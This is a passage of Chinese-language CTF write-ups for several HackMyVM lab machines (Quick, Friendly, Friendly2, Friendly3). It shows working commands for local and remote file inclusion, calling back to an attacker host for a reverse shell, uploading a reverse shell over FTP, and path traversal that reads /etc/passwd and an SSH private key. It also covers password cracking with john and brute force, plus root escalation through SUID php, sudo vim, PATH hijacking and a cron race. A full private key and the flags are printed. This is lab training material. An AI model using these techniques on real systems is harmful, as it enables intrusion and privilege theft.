<div class="reviewer-name">John Doe</div>
</div>
</div>
<div class="card">
<img src="images/jane.jpeg" alt="Profile Picture">
<div class="reviewer-info">
<div class="review-text">The car maintainance was great. The staff was very helpful.</div>
<div class="reviewer-name">Jane Smith</div>
</div>
</div>
</div>
</div>
<!-- Call to Action -->
<div class="content">
<section>
<h2>Get Your Car Care Done Today</h2>
<p>Do you have special wishes or problems with your car? Then <a href="index.php?page=contact" class="cta">schedule an appointment</a> with us. We will take care of your beloved car and ensure that it is like new again.
</section>
</div>
</body>
</html>
</main>
<footer>
<div class="footer">
<p>© <script type="text/javascript">document.write("1950 - "+ new Date().getFullYear());</script> Quick Automative. All rights reserved.</p>
</div>
</footer>
</body>
</html>
发现page 参数可以尝试去把index源码读取出来,http get http://192.168.105.153/index.php?page=php://filter/read=convert.base64-encode/resource=index
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Quick Automative</title>
<link rel="stylesheet" href="styles.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
</head>
<body>
<header>
<!-- Photo by Pixabay: https://www.pexels.com/photo/black-lamborghini-murcielago-38570/ -->
<img src="images/logo.png" alt="Logo" height="100">
</header>
<nav>
<ul>
<li><a href="index.php?page=home">Home</a></li>
<li><a href="index.php?page=cars">Cars</a></li>
<li><a href="index.php?page=maintenance_and_repair">Maintenance & Repair</a></li>
<li><a href="index.php?page=about">About</a></li>
<li><a href="index.php?page=contact">Contact</a></li>
</ul>
</nav>
<main>
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = 'home';
}
include($page . '.php');
?>
</main>
<footer>
<div class="footer">
<p>© <script type="text/javascript">document.write("1950 - "+ new Date().getFullYear());</script> Quick Automative. All rights reserved.</p>
</div>
</footer>
</body>
</html>
尝试远程包含kali上的reverse.php看看能不能反弹个shell,访问192.168.105.153/index.php?page=http://192.168.105.144:9999/reverse 即可反弹一个shell
先find看看有哪些可以使用的命令
www-data@quick:/home$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/snap/core20/1828/usr/bin/chfn
/snap/core20/1828/usr/bin/chsh
/snap/core20/1828/usr/bin/gpasswd
/snap/core20/1828/usr/bin/mount
/snap/core20/1828/usr/bin/newgrp
/snap/core20/1828/usr/bin/passwd
/snap/core20/1828/usr/bin/su
/snap/core20/1828/usr/bin/sudo
/snap/core20/1828/usr/bin/umount
/snap/core20/1828/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core20/1828/usr/lib/openssh/ssh-keysign /snap/snapd/18357/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/bin/at
/usr/bin/sudo
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/php7.0
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/fusermount
发现php7.0可以用,直接查看一手GTFObins
sudo install -m =xs $(which php) .
CMD="/bin/sh"
./php -r "pcntl_exec('/bin/sh', ['-p']);"
直接/usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);" 即可拿到root权限了
然后直接去拿user 和 root flag
cat user.txt
HMV{QUICK-user}
root flag
HMV{6ff5f1b9238a96b3c3871c67a215ec80}
Friendly
信息搜集
ip地址为192.168.70.118 使用rustscan对端口信息进行搜集
┌──(root㉿kali-plus)-[~]
└─# rustscan -a 192.168.70.118
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where scanning meets swagging.
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.70.118:21
Open 192.168.70.118:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-22 10:02 CST
Initiating ARP Ping Scan at 10:02
Scanning 192.168.70.118 [1 port]
Completed ARP Ping Scan at 10:02, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:02
Completed Parallel DNS resolution of 1 host. at 10:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:02
Scanning 192.168.70.118 [2 ports]
Discovered open port 80/tcp on 192.168.70.118
Discovered open port 21/tcp on 192.168.70.118
Completed SYN Stealth Scan at 10:02, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.70.118
Host is up, received arp-response (0.00081s latency).
Scanned at 2025-04-22 10:02:05 CST for 0s
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 00:0C:29:FE:88:BB (VMware)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
发现开放了80和21,发现80端口就是一个apache的服务,扫个目录看看,但是啥也没扫出来,ftp匿名登录进去只看到一个index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Debian Default Page: It works</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}
body, html {
padding: 3px 3px 3px 3px;
background-color: #D8DBE2;
font-family: Verdana, sans-serif;
font-size: 11pt;
text-align: center;
}
div.main_page {
position: relative;
display: table;
width: 800px;
margin-bottom: 3px;
margin-left: auto;
margin-right: auto;
padding: 0px 0px 0px 0px;
border-width: 2px;
border-color: #212738;
border-style: solid;
background-color: #FFFFFF;
text-align: center;
}
div.page_header {
height: 99px;
width: 100%;
background-color: #F5F6F7;
}
div.page_header span {
margin: 15px 0px 0px 50px;
font-size: 180%;
font-weight: bold;
}
div.page_header img {
margin: 3px 0px 0px 40px;
border: 0px 0px 0px;
}
div.table_of_contents {
clear: left;
min-width: 200px;
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.table_of_contents_item {
clear: left;
width: 100%;
margin: 4px 0px 0px 0px;
background-color: #FFFFFF;
color: #000000;
text-align: left;
}
div.table_of_contents_item a {
margin: 6px 0px 0px 6px;
}
div.content_section {
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.content_section_text {
padding: 4px 8px 4px 8px;
color: #000000;
font-size: 100%;
}
div.content_section_text pre {
margin: 8px 0px 8px 0px;
padding: 8px 8px 8px 8px;
border-width: 1px;
border-style: dotted;
border-color: #000000;
background-color: #F5F6F7;
font-style: italic;
}
div.content_section_text p {
margin-bottom: 6px;
}
div.content_section_text ul, div.content_section_text li {
padding: 4px 8px 4px 16px;
}
div.section_header {
padding: 3px 6px 3px 6px;
background-color: #8E9CB2;
color: #FFFFFF;
font-weight: bold;
font-size: 112%;
text-align: center;
}
div.section_header_red {
background-color: #CD214F;
}
div.section_header_grey {
background-color: #9F9386;
}
.floating_element {
position: relative;
float: left;
}
div.table_of_contents_item a,
div.content_section_text a {
text-decoration: none;
font-weight: bold;
}
div.table_of_contents_item a:link,
div.table_of_contents_item a:visited,
div.table_of_contents_item a:active {
color: #000000;
}
div.table_of_contents_item a:hover {
background-color: #000000;
color: #FFFFFF;
}
div.content_section_text a:link,
div.content_section_text a:visited,
div.content_section_text a:active {
background-color: #DCDFE6;
color: #000000;
}
div.content_section_text a:hover {
background-color: #000000;
color: #DCDFE6;
}
div.validator {
}
</style>
</head>
<body>
<div class="main_page">
<div class="page_header floating_element">
<img src="/icons/openlogo-75.png" alt="Debian Logo" class="floating_element"/>
<span class="floating_element">
Apache2 Debian Default Page
</span>
</div>
<!-- <div class="table_of_contents floating_element">
<div class="section_header section_header_grey">
TABLE OF CONTENTS
</div>
<div class="table_of_contents_item floating_element">
<a href="#about">About</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#changes">Changes</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#scope">Scope</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#files">Config files</a>
</div>
</div>
-->
<div class="content_section floating_element">
<div class="section_header section_header_red">
<div id="about"></div>
It works!
</div>
<div class="content_section_text">
<p>
This is the default welcome page used to test the correct
operation of the Apache2 server after installation on Debian systems.
If you can read this page, it means that the Apache HTTP server installed at
this site is working properly. You should <b>replace this file</b> (located at
<tt>/var/www/html/index.html</tt>) before continuing to operate your HTTP server.
</p>
<p>
If you are a normal user of this web site and don't know what this page is
about, this probably means that the site is currently unavailable due to
maintenance.
If the problem persists, please contact the site's administrator.
</p>
</div>
<div class="section_header">
<div id="changes"></div>
Configuration Overview
</div>
<div class="content_section_text">
<p>
Debian's Apache2 default configuration is different from the
upstream default configuration, and split into several files optimized for
interaction with Debian tools. The configuration system is
<b>fully documented in
/usr/share/doc/apache2/README.Debian.gz</b>. Refer to this for the full
documentation. Documentation for the web server itself can be
found by accessing the <a href="/manual">manual</a> if the <tt>apache2-doc</tt>
package was installed on this server.
</p>
<p>
The configuration layout for an Apache2 web server installation on Debian systems is as follows:
</p>
<pre>
/etc/apache2/
|-- apache2.conf
| `-- ports.conf
|-- mods-enabled
| |-- *.load
| `-- *.conf
|-- conf-enabled
| `-- *.conf
|-- sites-enabled
| `-- *.conf
</pre>
<ul>
<li>
<tt>apache2.conf</tt> is the main configuration
file. It puts the pieces together by including all remaining configuration
files when starting up the web server.
</li>
<li>
<tt>ports.conf</tt> is always included from the
main configuration file. It is used to determine the listening ports for
incoming connections, and this file can be customized anytime.
</li>
<li>
Configuration files in the <tt>mods-enabled/</tt>,
<tt>conf-enabled/</tt> and <tt>sites-enabled/</tt> directories contain
particular configuration snippets which manage modules, global configuration
fragments, or virtual host configurations, respectively.
</li>
<li>
They are activated by symlinking available
configuration files from their respective
*-available/ counterparts. These should be managed
by using our helpers
<tt>
a2enmod,
a2dismod,
</tt>
<tt>
a2ensite,
a2dissite,
</tt>
and
<tt>
a2enconf,
a2disconf
</tt>. See their respective man pages for detailed information.
</li>
<li>
The binary is called apache2. Due to the use of
environment variables, in the default configuration, apache2 needs to be
started/stopped with <tt>/etc/init.d/apache2</tt> or <tt>apache2ctl</tt>.
<b>Calling <tt>/usr/bin/apache2</tt> directly will not work</b> with the
default configuration.
</li>
</ul>
</div>
<div class="section_header">
<div id="docroot"></div>
Document Roots
</div>
<div class="content_section_text">
<p>
By default, Debian does not allow access through the web browser to
<em>any</em> file apart of those located in <tt>/var/www</tt>,
<a href="http://httpd.apache.org/docs/2.4/mod/mod_userdir.html" rel="nofollow">public_html</a>
directories (when enabled) and <tt>/usr/share</tt> (for web
applications). If your site is using a web document root
located elsewhere (such as in <tt>/srv</tt>) you may need to whitelist your
document root directory in <tt>/etc/apache2/apache2.conf</tt>.
</p>
<p>
The default Debian document root is <tt>/var/www/html</tt>. You
can make your own virtual hosts under /var/www. This is different
to previous releases which provides better security out of the box.
</p>
</div>
<div class="section_header">
<div id="bugs"></div>
Reporting Problems
</div>
<div class="content_section_text">
<p>
Please use the <tt>reportbug</tt> tool to report bugs in the
Apache2 package with Debian. However, check <a
href="http://bugs.debian.org/cgi-bin/pkgreport.cgi?ordering=normal;archive=0;src=apache2;repeatmerged=0"
rel="nofollow">existing bug reports</a> before reporting a new bug.
</p>
<p>
Please report bugs specific to modules (such as PHP and others)
to respective packages, not to the web server itself.
</p>
</div>
</div>
</div>
<div class="validator">
</div>
</body>
</html>
<!-- --- __ --- -->
user flag
但是可以上传文件,直接传一个reverse.php上去然后访问触发
┌──(root㉿kali-plus)-[~]
└─# ftp 192.168.70.118
Connected to 192.168.70.118. 220 ProFTPD Server (friendly) [::ffff:192.168.70.118]
Name (192.168.70.118:root): anonymous
331 Anonymous login ok, send your complete email address as your password Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||13041|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
226 Transfer complete
ftp> ls -al
229 Entering Extended Passive Mode (|||55672|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx 2 root root 4096 Mar 11 2023 .
drwxrwxrwx 2 root root 4096 Mar 11 2023 ..
-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
226 Transfer complete
ftp> put reverse.php
local: reverse.php remote: reverse.php
229 Entering Extended Passive Mode (|||27054|)
150 Opening BINARY mode data connection for reverse.php
100% |******************************************| 5493 13.74 MiB/s 00:00 ETA
226 Transfer complete
5493 bytes sent in 00:00 (2.56 MiB/s)
ftp> ls -al
229 Entering Extended Passive Mode (|||55029|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx 2 root root 4096 Apr 22 02:13 .
drwxrwxrwx 2 root root 4096 Apr 22 02:13 ..
-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
-rw-r--r-- 1 ftp nogroup 5493 Apr 22 02:13 reverse.php
226 Transfer complete
提权-root flag
拿到shell之后找提权的点
www-data@friendly:/$ sudo -l
sudo -l
atching Defaults entries for www-data on friendly: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on friendly:
(ALL : ALL) NOPASSWD: /usr/bin/vim
直接vim提权一手 使用命令 sudo vim -c ':!/bin/sh' 即可拿到root权限,然后直接去读user和root的flag
cat user.txt
b8cff8c9008e1c98a1f2937b4475acd6
# cat root.txt
cat root.txt
Not yet! Find root.txt.
说明这个不是真正的root flag,直接find去找
# find / -name root.txt 2>/dev/null
/var/log/apache2/root.txt
/root/root.txt
# cat /var/log/apache2/root.txt
66b5c58f3e83aff307441714d3e28d2f
Friendly2
信息搜集
ip地址为192.168.1.103 开放22和80端口 ,80端口就是一个普通的页面,没啥功能点,扫一下目录
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.103/ -x.txt,.php =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.1.103/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php
[+] Timeout: 10s ===============================================================
Starting gobuster in directory enumeration mode ===============================================================
/.php (Status: 403) [Size: 278]
/tools (Status: 301) [Size: 314] [--> http://192.168.1.103/tools/]
/assets (Status: 301) [Size: 315] [--> http://192.168.1.103/assets/]
/.php (Status: 403) [Size: 278]
/server-status (Status: 403) [Size: 278]
Progress: 904349 / 3821499 (23.66%)
[!] Keyboard interrupt detected, terminating. Progress: 905503 / 3821499 (23.69%)
===============================================================
Finished
===============================================================
发现有一个tools,继续扫描tools目录下有啥,发现有一个docements目录,然后又三个html,貌似没什么用,然后assets目录下放的是一些图片,回头看了一下tools页面的源码,发现一个提示
<!-- Redimensionar la imagen en check_if_exist.php?doc=keyboard.html -->
发现可以文件读取,可以读取/ect/passwdhttp://192.168.1.103/tools/check_if_exist.php?doc=../../../../../etc/passwd 看看能不能读一下ssh密钥,根据刚刚得到的用户信息,读取gh0st用户的ssh连接私钥http://192.168.1.103/tools/check_if_exist.php?doc=../../../../../home/gh0st/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
9tDhjVw3oagRmc3R03zfIwbPINo=
-----END OPENSSH PRIVATE KEY-----
user flag
但是用私钥还是需要密码,用john爆破一下
┌──(root㉿kali-plus)-[~]
└─# ssh2john tmp > hash.txt
┌──(root㉿kali-plus)-[~]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
celtic (tmp)
1g 0:00:00:01 DONE (2025-04-24 15:45) 0.5524g/s 141.4p/s 141.4c/s 141.4C/s carolina..freedom
Use the "--show" option to display all of the cracked passwords reliably Session completed.
得到密码为celtic 尝试登录,但是一直没登录上去,看了一下发现是ssh密钥格式问题,格式对了然后输入密码就能连上了
gh0st@friendly2:~$ cat user.txt
ab0366431e2d8ff563cf34272e3d14bd
提权-root flag
gh0st@friendly2:~$ sudo -l
Matching Defaults entries for gh0st on friendly2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User gh0st may run the following commands on friendly2:
(ALL : ALL) SETENV: NOPASSWD: /opt/security.sh
gh0st@friendly2:~$ cd /opt
gh0st@friendly2:/opt$ ls
0-day security.sh
gh0st@friendly2:/opt$ file 0-day 0-day: directory
gh0st@friendly2:/opt$ cd 0-day
gh0st@friendly2:/opt/0-day$ ls
names.txt
gh0st@friendly2:/opt/0-day$ cat names.txt
cat: names.txt: Permission denied
gh0st@friendly2:/opt/0-day$ cd ..
gh0st@friendly2:/opt$ ls 0-day security.sh
gh0st@friendly2:/opt$ cat security.sh
#!/bin/bash
echo "Enter the string to encode:"
read string
# Validate that the string is no longer than 20 characters
if [[ ${#string} -gt 20 ]]; then
echo "The string cannot be longer than 20 characters."
exit 1
fi
# Validate that the string does not contain special characters
if echo "$string" | grep -q '[^[:alnum:] ]'; then
echo "The string cannot contain special characters."
exit 1
fi
sus1='A-Za-z'
sus2='N-ZA-Mn-za-m'
encoded_string=$(echo "$string" | tr $sus1 $sus2)
echo "Original string: $string"
echo "Encoded string: $encoded_string"
这个bash脚本是对输入的内容进行rot13加密,脚本中用到了grep,但是没使用绝对路径,改个环境变量就好了
gh0st@friendly2:/opt$ cd /tmp
gh0st@friendly2:/tmp$ echo 'chmod +s /bin/bash' > grep
gh0st@friendly2:/tmp$ chmod +x grep
gh0st@friendly2:/tmp$ ls grep systemd-private-8f30f03d74e0499ea061bbd4a882ad65-apache2.service-Zu9Zkg systemd-private-8f30f03d74e0499ea061bbd4a882ad65-systemd-logind.service-fRSdmh gh0st@friendly2:/tmp$ where is grep bash: where: command not found gh0st@friendly2:/tmp$ whereis grep grep: /usr/bin/grep /usr/share/man/man1/grep.1.gz /usr/share/info/grep.info.gz gh0st@friendly2:/tmp$ sudo PATH=$PWD:$PATH /opt/security.sh
Enter the string to encode: 123213
The string cannot contain special characters.
gh0st@friendly2:/tmp$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27 2022 /bin/bash
gh0st@friendly2:/tmp$ bash -p
bash-5.1# cd /root
bash-5.1# ls
interfaces.sh root.txt
bash-5.1# cat root.txt
Not yet! Try to find root.txt.
Hint: ...
bash-5.1# find / -name "..." 2>/dev/null
/...
bash-5.1# cd /...
bash-5.1# ls
ebbg.txt
bash-5.1# cat ebbg.txt
It's codified, look the cipher:
98199n723q0s44s6rs39r33685q8pnoq
Hint: numbers are not codified
这里显示是没有被编码的,应该是需要用脚本加密一下,直接用赛博厨子加密一下就行,得到root flag为98199a723d0f44f6ef39e33685d8cabd
Friendly3
信息搜集
ip地址为192.168.1.103 开放了21,22,80端口,80端口的web页面有一句话
Hi, sysadmin
I want you to know that I've just uploaded the new files into the FTP Server.
See you,
juan.
意思是告诉我们ftp,也就是21端口有东西,看看能不能匿名登录进去看看,发现匿名登录进不去,看看能不能爆破一下ftp的密码,根据刚刚得到的提示,用户名是sysadmin或者juan
[21][ftp] host: 192.168.1.103 login: juan password: alexis
得到密码alexis 登录进去看看 发现好多文件,但是貌似没什么用,先放一边,看看能不能爆破ssh的
密码
user flag
[22][ssh] host: 192.168.1.103 login: juan password: alexis
发现是一样的密码
┌──(root㉿kali-plus)-[~]
└─# ssh juan@192.168.1.103
juan@192.168.1.103's password:
Linux friendly3 6.1.0-9-amd64 #1 SMP PREEMPT_DYNAMIC
Debian 6.1.27-1 (2023-05-08) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
juan@friendly3:~$ ls
ftp user.txt
juan@friendly3:~$ cat user.txt
cb40b159c8086733d57280de3f97de30
提权-root flag
juan@friendly3:/home/blue$ curl http://192.168.1.102:9999/pspy64 > pspy
-bash: pspy: Permission denied
juan@friendly3:/home/blue$ cd /tmp
juan@friendly3:/tmp$ curl http://192.168.1.102:9999/pspy64 > pspy
% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 3032k 100 3032k 0 0 30.4M 0
--:--:-- --:--:-- --:--:-- 30.5M
juan@friendly3:/tmp$ chmod +x pspy
juan@friendly3:/tmp$ ./pspy
2025/04/25 05:22:19 CMD: UID=0 PID=1 | /sbin/init
2025/04/25 05:23:01 CMD: UID=0 PID=1414 | /usr/sbin/CRON -f
2025/04/25 05:23:01 CMD: UID=0 PID=1416 | /bin/sh -c /opt/check_for_install.sh
2025/04/25 05:23:01 CMD: UID=0 PID=1415 | /bin/sh -c /opt/check_for_install.sh
2025/04/25 05:23:01 CMD: UID=0 PID=1417 | /bin/bash /opt/check_for_install.sh 2025/04/25 05:23:01 CMD: UID=0 PID=1418 | /bin/bash /opt/check_for_install.sh 2025/04/25 05:23:01 CMD: UID=0 PID=1419 | /bin/bash /opt/check_for_install.sh 2025/04/25 05:23:01 CMD: UID=0 PID=1420 | /bin/bash /opt/check_for_install.sh 2025/04/25 05:23:01 CMD: UID=0 PID=1421 | /bin/bash /opt/check_for_install.sh 2025/04/25 05:23:01 CMD: UID=0 PID=1422 | rm -rf /tmp/a.bash
发现一个定时任务
#!/bin/bash
/usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash
chmod +x /tmp/a.bash
chmod +r /tmp/a.bash
chmod +w /tmp/a.bash
/bin/bash /tmp/a.bash
rm -rf /tmp/a.bash
这个脚本先是把9842734723948024.bash的内容重定向到/tmp/a.bash,接着一步一步的给权限,不是一次性给完,这就导致有一部分时间是可以写入的,可以尝试劫持
for i in $(seq 10000);do echo 'cp /bin/bash /tmp/sh;chmod +s /tmp/sh' > a.bash;done
juan@friendly3:/tmp$ ls -al
total 4300
drwxrwxrwt 7 root root 4096 Apr 25 05:45 .
drwxr-xr-x 18 root root 4096 Jun 25 2023 ..
-rw-r--r-- 1 juan juan 38 Apr 25 05:45 a.bash
drwxrwxrwt 2 root root 4096 Apr 25 05:35 .font-unix
drwxrwxrwt 2 root root 4096 Apr 25 05:35 .ICE-unix
-rwxr-xr-x 1 juan juan 3104768 Apr 25 05:36 pspy
-rwsr-sr-x 1 root root 1265648 Apr 25 05:45 sh
drwx------ 3 root root 4096 Apr 25 05:35 systemd-private-c8b3760a22ef41a289c2a5be45d684a8-systemd-logind.service-JL49lM
drwxrwxrwt 2 root root 4096 Apr 25 05:35 .X11-unix
drwxrwxrwt 2 root root 4096 Apr 25 05:35 .XIM-unix
juan@friendly3:/tmp$ ./sh -p
sh-5.2# id uid=1001(juan) gid=1001(juan) euid=0(root) egid=0(root) groups=0(root),1001(juan)
sh-5.2# pwd
/tmp
sh-5.2# cd /root
sh-5.2# ls
interfaces.sh root.txt
sh-5.2# cat root.txt
eb9748b67f25e6bd202e5fa25f534d51
浙公网安备 33010602011771号